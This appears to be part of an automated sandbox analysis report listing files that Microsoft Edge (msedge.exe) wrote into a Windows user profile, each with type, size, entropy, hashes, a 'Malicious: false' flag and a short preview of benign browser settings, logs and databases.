C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-672EBF2B-1598.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.4511214426743665
Encrypted:	false
SSDEEP:	6144:BEynGZhGEAiyJEE6Y/qfElSOknVIcaHp:UAisEFgn
MD5:	2D65B2D0D7902CBE62EC941F8DE0D9F3
SHA1:	F9805043C54ABF0E36A7E4349516038046458F41
SHA-256:	70AAFEFC7631C766C554AE6D87C504E4BC762724104DB57A490ADBF809DDA34A
SHA-512:	A7599AC0C73272D081C66F1379D3C793032278D366D20856CFC04AEB266CB6ABC6F88C7DC293AF87557899F4DB44FE9D9F1F3213D5476423156AC04D2A4DAC48
Malicious:	false
Preview:	...@..@...@.....C.].....@...................p...............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?.......".qnktbu20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U?:K...G...W6.>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. ....2.....

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.16517681506792
Encrypted:	false
SSDEEP:	3:FiWWltlrPYjpVjP9M4UcLH3RvwAH/llwBVP/Sh/Jzv/jSIHmsdJEU9VUn5lt:o1rPWVjWZq3RvtNlwBVsJDL7b/3U7
MD5:	C847567DEE0317368C1EC824DE025887
SHA1:	554098F22FEA9282FE1AAB35560849CD6FF546B1
SHA-256:	3CF2B1CBE4F4CCFC640BCF581FD4D9FC84254D2B3839C96EA4909B61AAF28932
SHA-512:	A976744405F6ABEBFB7513A3A6A776680334BB94A9E52AEEFE2B05259BCB3CF9781B1CCDA3655D8AA4C1E923143168F29EF3208F81ABCB93AFF5215ED3798219
Malicious:	false
Preview:	sdPC.....................!...W.F....+F."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................8889edf7-b09d-4a45-9ea5-adabbfd01bb9............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\07e72b1e-daab-4793-a944-a14edfc0044d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40504
Entropy (8bit):	5.561663825585966
Encrypted:	false
SSDEEP:	768:5ZGaf97pLGLpQaWPnvfJ38F1+UoAYDCx9Tuqh0VfUC9xbog/OV12tWiEirwUgvn2:5ZGafrcpQaWPnvfJ3u1jas2tXEHUgvn2
MD5:	D4A7904CB9879263A80343BEC967A4F4
SHA1:	8D85BB42886F0584E262986D697FEC135408DECD
SHA-256:	1014AADAC1BFC56B8738C40E8955B5399CC706CE774ACF29FF63C1A046AAABE8
SHA-512:	5C37C713596E86DDA602ACD5FEE6A8AA022DAF19861BEBC73B2EAD6ECCC2B159EE055B4CA7EBBA9D4A371D08E5D04309FC15E6ECF50D59A5834996585D128A80
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13375590443683056","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13375590443683056","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\0a560224-8822-4927-982f-017ba6190406.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\33305c11-412e-4ffe-8b17-4a8f3c754e53.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	37149
Entropy (8bit):	5.564737347223386
Encrypted:	false
SSDEEP:	768:5ZGaxaWPnvfS38F1+UoAYDCx9Tuqh0VfUC9xbog/OV12tWiEirwUg2bqKpktuZ:5ZGaxaWPnvfS3u1jas2tXEHUg2+ZtK
MD5:	18F1B7FC6ECD564EFA5AC69C12A83A86
SHA1:	A6B877D1A7E47FFD130DCC13D78F89F96896CBA7
SHA-256:	3B64268FA832215AABCD16571D42279C198C2C9D43C4C7C9014FBC7BC21E1D9B
SHA-512:	343CF70AACEF770AC2157537448A5D6BE820BBD76A1E6C763F9F1E73380C7665E37DE8214BA0FBCF126C66459B4527092B5C2E3FCBB16924F2BC4F3756689766
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13375590443683056","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13375590443683056","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\38f39464-cdfa-43b1-a086-98e82d6e3cd6.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17263), with no line terminators
Category:	dropped
Size (bytes):	17265
Entropy (8bit):	5.482743879263158
Encrypted:	false
SSDEEP:	192:sttJ99QTryDigabatSuypasruyaNP78pzkzNovnwKvmo5f58rbV+Fm5QwxPkPouC:sttPGKSu4asrutJ7wXeo2bGUQwdCC
MD5:	33D6F84E2F5A8FEAE099EA3EFC9607EB
SHA1:	37E05DC7F21B6FA6E12995C171D422E3E74B8647
SHA-256:	E99F5008ED52172288325A00603FF13F15AD38E4A4DF339594EFEE0A15F7DCFA
SHA-512:	8A57645E673C0863BAEE26EF38F42B0CCC53B32898EF00CB54385BDB348B71EF7CCDFEC40EFD1170F442B963A4C200B9B9C1D175B5FF1A79D3FD1F316AF798D6
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375590444416050","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\417c149f-5d96-4c69-bf44-075798ab147d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	13537
Entropy (8bit):	5.232101399901564
Encrypted:	false
SSDEEP:	192:sttJ99QTryDigabatSuypasruyaNP9kaDNovg58rbV+Fm5QwxrLPouNYJ:sttPGKSu4asrutJMbGUQw1C
MD5:	C0A63C690A55E5DB989ABB66795E16D1
SHA1:	C9BF2ADA895A08DAC8C45886B72E3BF2C8299B10
SHA-256:	BE173D490092E474CDA279FC5B810212385302863FA94EDEA8058FD67F83031F
SHA-512:	24E88A7F957D18CEB929EF9883FE5BC028C1A7546150339BF7C618333A323731A20C47514B0D47F2DC06B8DFB64E443973CEEF361CE417B4BCF307D16A6E4B62
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375590444416050","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8314a2d1-8313-4119-942b-f0bca2480f97.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17263), with no line terminators
Category:	dropped
Size (bytes):	17265
Entropy (8bit):	5.482782910588336
Encrypted:	false
SSDEEP:	192:sttJ99QTryDigabatSuypasruyaNP78pzkzNovnwKvmo5f58rbV+Fm5QwxfkPouC:sttPGKSu4asrutJ7wXeo2bGUQw9CC
MD5:	2638A8556BBD4D9BCF1D5C11CB08393F
SHA1:	ED076FCC5DF5461213C562C969D2AC36F5853A81
SHA-256:	815D5B0A68DC6C39FE74A1BE9E356AE7A9696718EDF594BFFA1DE7374005A14E
SHA-512:	3D40814F5E7E5AE94F8C758854F1119318E608B611B9622B67A062F3D9FC48681D5E921720B5BB57FDC27415B348F03FBBDA4182E027E24C9E27683F46C2DAAB
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375590444416050","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	33
Entropy (8bit):	3.5394429593752084
Encrypted:	false
SSDEEP:	3:iWstvhYNrkUn:iptAd
MD5:	F27314DD366903BBC6141EAE524B0FDE
SHA1:	4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
SHA-256:	68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
SHA-512:	07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
Malicious:	false
Preview:	...m.................DB_VERSION.1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	315
Entropy (8bit):	5.254794678548853
Encrypted:	false
SSDEEP:	6:HOJuq0RM1cNwi23oH+Tcwtp3hBtB2KLlVO9Mq2PcNwi23oH+Tcwtp3hBWsIFUv:u7o2ZYebp3dFL29MvLZYebp3eFUv
MD5:	F40FDD79CD1BC6E12E132637AFDACEAB
SHA1:	B70A4887E72D1EED28E0FC9DA59D5CCF92B49E85
SHA-256:	E3AFB53D4E27137EC585962DF09AEEA97A24FBF4F46E489998A54CEC64623E24
SHA-512:	7BB77467C9E025A582587ED9714EE954412D6B8DBD9C36D4B04890315FCD6778DDB19DA900BD229AB138550D9A7B6F17C8080D46DB3F6752EF71F163F35D0D04
Malicious:	false
Preview:	2024/11/08-20:47:29.329 10e4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/11/08-20:47:29.527 10e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	1696115
Entropy (8bit):	5.040621911250449
Encrypted:	false
SSDEEP:	24576:kdf76gGkISshcFdmcOAoPENUpifYP+MbI2T:kdfgAmmE
MD5:	23C142A234364D154BBD17D46FE947C4
SHA1:	D7413903BD5DB2BE25D3ABB3D3323E34885FA220
SHA-256:	B385027CE734F3607D4BC8D7C29A994C0C1D6600EEE3CD8DE790710AE6BF1A26
SHA-512:	681A4BF6108F6DB7498DF0F4EF27D13923696E98475410792FF1DA252DCBB1E5950B8430793B279C5EE28445AE864D96FD6ADE73980D704450A25485982B2143
Malicious:	false
Preview:	...m.................DB_VERSION.1.....................QUERY_TIMESTAMP:arbitration_priority_list4...13340965219355520.$QUERY:arbitration_priority_list4....[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.126630533492209
Encrypted:	false
SSDEEP:	6:HC1q2PcNwi23oH+Tcwt9Eh1tIFUt8YCQZmw+YC1kwOcNwi23oH+Tcwt9Eh15LJ:i1vLZYeb9Eh16FUt8HQ/+H154ZYeb9Er
MD5:	551FC094B46B1D78BBEF3EA05FDBE756
SHA1:	13C048C3D4598ED7D899C7DDA2ADC7B34C28F8CC
SHA-256:	A1FDE1ED2C774AF43E54DB95D7B030974FF6E4590F03EF676BCDE80AA2C72F8D
SHA-512:	E3278E13E196E0099F7F9D2024BA0CE05CDB0998D3AD5FE5B8A754487D2077FF6FE4C786388FB203710BEB4898285015CDB6BE29848BA5936A08E626A4A589E0
Malicious:	false
Preview:	2024/11/08-22:33:28.725 20e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/08-22:33:28.747 20e4 Recovering log #3.2024/11/08-22:33:28.760 20e4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.126630533492209
Encrypted:	false
SSDEEP:	6:HC1q2PcNwi23oH+Tcwt9Eh1tIFUt8YCQZmw+YC1kwOcNwi23oH+Tcwt9Eh15LJ:i1vLZYeb9Eh16FUt8HQ/+H154ZYeb9Er
MD5:	551FC094B46B1D78BBEF3EA05FDBE756
SHA1:	13C048C3D4598ED7D899C7DDA2ADC7B34C28F8CC
SHA-256:	A1FDE1ED2C774AF43E54DB95D7B030974FF6E4590F03EF676BCDE80AA2C72F8D
SHA-512:	E3278E13E196E0099F7F9D2024BA0CE05CDB0998D3AD5FE5B8A754487D2077FF6FE4C786388FB203710BEB4898285015CDB6BE29848BA5936A08E626A4A589E0
Malicious:	false
Preview:	2024/11/08-22:33:28.725 20e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/08-22:33:28.747 20e4 Recovering log #3.2024/11/08-22:33:28.760 20e4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.4621583891761608
Encrypted:	false
SSDEEP:	24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBugQp:TouQq3qh7z3bY2LNW9WMcUvBuP
MD5:	9BE9CD655ABE36957571216D2D50036C
SHA1:	AF9755CC68FE62CFFFA97403B08E3EAD8A999D1E
SHA-256:	452FC34EBF898C0E4DC61ED352F7515A3A569513ED9C6ABFD3397DB9FC398D1F
SHA-512:	E46ADC141A202683029D5D0B44FB440C584B110D4AE3DC745C89712D553249392487C59719D72EC28C6BA285DA25F9F1173765AE25F11D94FC29E57A5CA8093B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	0.8708334089814068
Encrypted:	false
SSDEEP:	12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
MD5:	92F9F7F28AB4823C874D79EDF2F582DE
SHA1:	2D4F1B04C314C79D76B7FF3F50056ECA517C338B
SHA-256:	6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
SHA-512:	86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	354
Entropy (8bit):	5.1935555670679845
Encrypted:	false
SSDEEP:	6:Hwd3syq2PcNwi23oH+TcwtnG2tMsIFUt8Ywdv1Zmw+Ywd5RkwOcNwi23oH+TcwtB:I3BvLZYebn9GFUt8Nv1/+Nf54ZYebn9b
MD5:	275A18A470EEA62606E6DDE7EFD1DC13
SHA1:	05A593FD32652913B5ED1C8C30D5368ADDDFCE8C
SHA-256:	43588E455DD4D8D1FB04C687CEC8A3EBC0A89976073872D1F4F1D5F5EDEA5CD6
SHA-512:	94CF5469697CEB8E2E8194019BB4451B064F4222CAF1CB73C86E45B731DB6A839E6F2A5258C306C3899B5943461DE3FBC54D106696B64439BB641FF799F8E692
Malicious:	false
Preview:	2024/11/08-20:47:23.809 14c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/08-20:47:23.811 14c0 Recovering log #3.2024/11/08-20:47:23.811 14c0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	354
Entropy (8bit):	5.1935555670679845
Encrypted:	false
SSDEEP:	6:Hwd3syq2PcNwi23oH+TcwtnG2tMsIFUt8Ywdv1Zmw+Ywd5RkwOcNwi23oH+TcwtB:I3BvLZYebn9GFUt8Nv1/+Nf54ZYebn9b
MD5:	275A18A470EEA62606E6DDE7EFD1DC13
SHA1:	05A593FD32652913B5ED1C8C30D5368ADDDFCE8C
SHA-256:	43588E455DD4D8D1FB04C687CEC8A3EBC0A89976073872D1F4F1D5F5EDEA5CD6
SHA-512:	94CF5469697CEB8E2E8194019BB4451B064F4222CAF1CB73C86E45B731DB6A839E6F2A5258C306C3899B5943461DE3FBC54D106696B64439BB641FF799F8E692
Malicious:	false
Preview:	2024/11/08-20:47:23.809 14c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/08-20:47:23.811 14c0 Recovering log #3.2024/11/08-20:47:23.811 14c0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6128282668107243
Encrypted:	false
SSDEEP:	24:TLapR+DDNzWjJ0npnyXKUO8+jF7l+Cpq27+4mL:TO8D4jJ/6Up+RyCI
MD5:	409824FD12A66802236FEB168D2F9098
SHA1:	E5484B014BAECCB305DC4CAC4CD2BB671C2FAB06
SHA-256:	89E0D32ABC0241ABB3B8073F8C6B57EC7523D96E2B0EA334494CF4EA9696FC96
SHA-512:	9C6207BB3FC84F3BD7054A5E69AEF4FAB6658E300821B2A911EE7490E4F9406E56AA6E05F196615B333AC906E8810C6A75C602B39D5849D53F1C51E941AB9FF0
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

Download File

